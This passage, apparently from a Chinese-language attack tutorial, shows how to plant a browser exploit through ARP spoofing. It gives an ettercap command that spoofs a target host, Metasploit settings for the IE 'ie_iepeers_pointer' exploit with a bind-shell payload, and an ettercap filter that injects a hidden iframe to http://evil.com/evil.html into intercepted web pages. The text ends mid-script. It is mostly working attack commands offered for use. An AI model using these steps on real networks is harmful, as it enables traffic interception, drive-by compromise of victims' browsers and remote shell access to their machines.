三、arp挂马
利用ARP 欺骗把数据流都引到本地,然后替换成我们事先准备好的挂马代码,再转发出去。
ettercap -T -q -F ieexpft -M arp:remote /192.168.1.105/ // 表示对192.168.1.105主机进行arp欺骗 启动Msf的使用 
use exploit/windows/browser/ie_iepeers_pointer 
set SRVHOST 192.168.1.103(攻击者ip) Msf会自动为我们开启类似服务 其他默认就可下面指定payload使用这个set PAYLOAD window/shell/bind_tcp Payload的选项保持默认就行默认绑定4444端口 目标:0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0 
下面看一下ettercap的过滤脚本马上开始 ettercap使用的过滤脚本 If(ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data,"Accept-Encoding")) {
replace("Accept-Encoding","Accept-Mousecat");
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "<body>") ){
replace("<body>","<body> <iframe src=\"http://evil.com/evil.html\"width=0 height=0 >");
msg("Filter Run...&&Exploit Code Injected OK!\n");
